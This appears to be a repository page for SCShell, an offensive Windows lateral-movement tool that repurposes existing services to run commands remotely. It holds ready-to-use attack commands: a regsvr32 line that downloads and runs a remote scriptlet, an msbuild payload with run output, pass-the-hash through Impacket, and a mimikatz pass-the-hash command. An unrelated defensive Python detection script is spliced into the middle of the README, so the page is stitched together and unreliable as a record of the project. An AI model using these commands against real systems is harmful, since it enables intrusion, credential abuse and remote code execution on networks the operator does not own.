• Stars: 1,268
• Rank 37,109 (Top 0.8 %)
• Language: C
• Created about 5 years ago
• Updated over 1 year ago


Repository Details

Fileless lateral movement tool that relies on ChangeServiceConfigA to run commands

SCShell

SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.

The utility can be used remotely WITHOUT registering or creating a service. It also does not have to drop any file on the remote system* (*depending on the technique used for execution).

How it works

Instead of creating a service, it simply opens an existing service remotely and modifies its binary path name via the ChangeServiceConfigA API.

Then it starts the service.

Once execution has completed, the service binary path is reverted to the original one. The original service path is extracted using QueryServiceConfigA.

Everything is happening over DCERPC including the authentication.
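A defender-side check for the behaviour described above, added here as an example (it is not part of SCShell or the Impacket script): assuming a Sysmon configuration that records Event ID 13 (registry value set) writes under Services\*\ImagePath, it flags LOLBin-style ImagePath values and the change-then-revert pattern that the open/modify/start/restore sequence leaves behind. The event records, baseline paths and field names are constructed assumptions.

```python
from datetime import datetime, timedelta

SERVICES_KEY = "HKLM\\System\\CurrentControlSet\\Services\\"
# LOLBin hints that a legitimate service ImagePath should not carry (heuristic, assumed)
SUSPICIOUS_HINTS = ("cmd.exe", "powershell", "regsvr32", "msbuild", "rundll32", "mshta")

# Constructed baseline and Sysmon EID 13 samples (illustrative values, not copied from a host).
# The SCM (services.exe) is the process that writes ImagePath when ChangeServiceConfig is used.
BASELINE = {"XblAuthManager": "%SystemRoot%\\system32\\svchost.exe -k netsvcs",
            "Spooler": "%SystemRoot%\\System32\\spoolsv.exe"}
SAMPLE_EVENTS = [
    {"time": "2024-01-10T10:00:00", "event_id": 13, "image": r"C:\Windows\System32\services.exe",
     "target": SERVICES_KEY + "XblAuthManager\\ImagePath",
     "details": r"C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj"},
    {"time": "2024-01-10T10:00:04", "event_id": 13, "image": r"C:\Windows\System32\services.exe",
     "target": SERVICES_KEY + "XblAuthManager\\ImagePath", "details": BASELINE["XblAuthManager"]},
    {"time": "2024-01-10T10:02:00", "event_id": 13, "image": r"C:\Windows\System32\services.exe",
     "target": SERVICES_KEY + "XblAuthManager\\Start", "details": "DWORD (0x00000003)"},  # not ImagePath
    {"time": "2024-01-10T11:00:00", "event_id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target": SERVICES_KEY + "Spooler\\ImagePath", "details": r"C:\Program Files\Vendor\spool.exe"},
]

def service_name(target):
    """Service name if target is a ...\\Services\\<name>\\ImagePath value, else None."""
    low = target.lower()
    if not low.startswith(SERVICES_KEY.lower()) or not low.endswith("\\imagepath"):
        return None
    return target[len(SERVICES_KEY):].split("\\")[0]

def find_imagepath_abuse(events, baseline, window=timedelta(minutes=5)):
    """Flag LOLBin ImagePath values and away-from-baseline changes reverted within `window`.
    A change that is never reverted (e.g. an installer) is left to a separate baseline review."""
    pending, findings = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        svc = service_name(ev["target"]) if ev["event_id"] == 13 else None
        if svc is None:
            continue
        t, value = datetime.fromisoformat(ev["time"]), ev["details"]
        if any(h in value.lower() for h in SUSPICIOUS_HINTS):
            findings.append({"kind": "suspicious_value", "service": svc, "value": value, "image": ev["image"]})
        base = baseline.get(svc)
        if base is None:
            continue
        if value != base:
            pending[svc] = (t, value)       # moved away from the known-good path
        elif svc in pending:
            start, interim = pending.pop(svc)
            if t - start <= window:         # restored quickly: the modify/start/revert pattern
                findings.append({"kind": "transient_swap", "service": svc, "interim": interim,
                                 "seconds": (t - start).total_seconds()})
    return findings

if __name__ == "__main__":
    for finding in find_imagepath_abuse(SAMPLE_EVENTS, BASELINE):
        print(finding)
```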


Usage

The current build is written in C but I will port it to C# and PowerShell.

Usage:
SCShell.exe target service payload domain username password

target can be set to local to run the payload locally

Remote execution

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrator Password

I recommend using C:\windows\system32\cmd.exe /c to make sure the payload will not be killed once the service stops. You NEED to use the full path.

You can also use an msbuild payload

SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password
SCShell ***
Trying to connect to 192.168.197.131
Username was provided attempting to call LogonUserA
SC_HANDLE Manager 0x009ED250
Opening XblAuthManager
SC_HANDLE Service 0x009ED1B0
Service path was changed to C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
Service was started.

I'm using XblAuthManager as the target, which is the Xbox Accessory Management Service.

Passing the Hash

scshell.py is a Python 2 & 3 implementation of SCShell. Using the impacket project, it can easily be used to perform the same lateral movement with pass the hash.

Installation

pip install impacket

Usage

python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

You can use the C utility to pass the hash. By default the current process token will be used. You can set the current process token using the standard pass-the-hash approach.

On the local system

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

Then run SCShell.exe from within the newly created cmd.exe.

Compiling from source

The code was compiled on Windows using the GCC MinGW compiler.

Credit

Mr.Un1k0d3r RingZer0 Team

Tazz0 for the moral support
